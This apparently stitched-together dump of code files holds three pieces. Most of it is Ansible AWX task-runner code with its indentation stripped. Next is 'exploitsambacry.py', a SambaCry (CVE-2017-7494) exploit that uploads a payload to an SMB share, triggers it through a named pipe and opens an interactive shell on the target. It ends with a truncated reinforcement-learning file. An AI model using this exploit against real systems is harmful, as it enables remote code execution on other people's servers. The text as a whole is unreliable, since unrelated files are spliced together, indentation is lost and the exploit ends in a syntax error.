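# revision, then shallow-clone over a file:// URI so depth/single-branch options are
# honored. src_path, dest_path and revision are hypothetical inputs.
from pathlib import Path
from uuid import uuid4
import git
def _shallow_copy_at_revision(src_path, dest_path, revision):
    repo = git.Repo(src_path)
    tmp_branch = repo.create_head('tmp_copy/{}'.format(uuid4()), revision)
    try:
        git.Repo.clone_from(Path(src_path).as_uri(), dest_path,
                            branch=tmp_branch, depth=1, single_branch=True)
    finally:
        repo.delete_head(tmp_branch, force=True)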
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: containers
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
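# A minimal illustrative sketch (not from the original module), slightly simplified,
# of the path merging above: the project's requirements_collections folder goes first,
# any existing configured paths follow, and the stock defaults come last.
import os
def _prepend_collections_path(extra, existing=None,
                              default='~/.ansible/collections:/usr/share/ansible/collections'):
    paths = default.split(':')
    if existing:
        paths = [p for p in existing.split(':') if p not in paths] + paths
    return os.pathsep.join([extra] + paths)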
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join('/runner', rel_path) # TODO: make container paths elegant
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join('/runner', 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
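# Illustrative example (hypothetical values, not from the original module): for an SCM
# inventory update with id 42, source_path 'inventories/dev.ini' and verbosity 1,
# build_args() above would produce roughly:
#   ansible-inventory --list --export -i /runner/project/inventories/dev.ini
#       --output /runner/artifacts/42/output.json
#       --playbook-dir /runner/project/inventories -vvv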
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = injector.filename
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_cwd(self, inventory_update, private_data_dir):
"""
There is one case where the inventory "source" is in a different
location from the private data:
- SCM, where source needs to live in the project folder
"""
src = inventory_update.source
container_dir = '/runner' # TODO: make container paths elegant
if src == 'scm' and inventory_update.source_project_update:
return os.path.join(container_dir, 'project')
return container_dir
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occurred while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_cwd(self, ad_hoc_command, private_data_dir):
return private_data_dir
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it in a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_cwd(self, instance, private_data_dir):
return settings.BASE_DIR
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
threading.Thread(target=self.transmit, args=[sockin]).start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occurred at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
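# A minimal illustrative sketch (not from the original module) of the concurrency pattern
# used above: race two workers and act on whichever finishes first. In the real code the
# loser is then unblocked by closing its socket; here both stand-in callables terminate
# on their own.
import concurrent.futures
def _first_completed(fn_a, fn_b):
    with concurrent.futures.ThreadPoolExecutor(max_workers=2) as pool:
        futures = [pool.submit(fn_a), pool.submit(fn_b)]
        done = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
        return list(done.done)[0].result()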
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task:
ee = self.task.instance.resolve_execution_environment()
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
default_pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"awx-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
exploitsambacry.py | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
import os
from impacket.dcerpc.v5 import transport
from impacket.smbconnection import *
import sys
import time
import socket
from threading import Thread
class SambaCry:
"""
Sambacry (CVE-2017-7494)
Tested on samba 5.4.9
"""
port = 445
def __init__(self):
pass
@staticmethod
def dce_trigger(dce):
try:
dce.connect()
except SessionError as error:
print "[+] Ocekavana vyjimka od: Samba (SMB SessionError)"
except nmb.NetBIOSError as error:
print " [-] Spojeni ukonceno"
except nmb.NetBIOSTimeout as error:
pass
@staticmethod
def receive_and_print(sock):
try:
while True:
data = sock.recv(8)
if not data:
break
sys.stdout.write(str(data))
except Exception as e:
print "[-] Vyjimka: " + str(e)
@staticmethod
def exploit(target, port, executable, remote_share, remote_path, user=None, password=None, remote_shell_port=None):
"""Samba exploit"""
# Open the connection
try:
smb_client = SMBConnection(target, target, sess_port=port)
except socket.error as error:
print "[-] Chyba spojeni", error.message
return
if user:
try:
if not smb_client.login(user, password):
raise Exception("[-] Chyba autentizace, neplatne uzivatelske jmeno nebo heslo")
else:
print "[i] Autentizace ok, jsme tam !"
except SessionError as error:
print "[-] Chyba spojeni", error.message
return
# Upload the payload module
print "[+] Pripravuji exploit"
executable_name = os.path.basename(executable)
executable_file = open(executable, 'rb')
smb_client.putFile(remote_share, executable_name, executable_file.read)
executable_file.close()
# Trigger the bug in another thread, since it will be locked
trigger_module = r'ncacn_np:%s[\pipe\%s]' % (target, remote_path)
rpc_transport = transport.DCERPCTransportFactory(trigger_module)
dce = rpc_transport.get_dce_rpc()
trigger_thread = Thread(target=SambaCry.dce_trigger, args=(dce,))
trigger_thread.daemon = True
trigger_thread.start()
# Give some time to the exploit to run
time.sleep(2)
# Profit
if not remote_shell_port:
print "[i] Cil napaden, over si to"
return
remote_shell_port = int(remote_shell_port)
print "[+] Exploit trigger bezi v pozadi, kontroluji nas shell"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[+] Pripojuji se k %s port %s" % (target, str(remote_shell_port))
sock.connect((target, remote_shell_port))
print "[+] Overuji tvuj shell..."
command = "uname -a"
# Receive and print data in another thread
receive_thread = Thread(target=SambaCry.receive_and_print, args=(sock,))
receive_thread.daemon = True
receive_thread.start()
while True:
try:
sock.send(command)
sock.send("\n")
except nmb.NetBIOSError:
break
command = raw_input(">>")
sock.close()
except Exception as e:
print "[-] IO error pripojeni k shellu " + str(e)"
|
agent.py | import multiprocessing
from utils.replay_memory import Memory
from utils.torch import *
import math
import time
import os
import numpy as np
def collect_samples(pid, queue, env, policy, custom_reward,
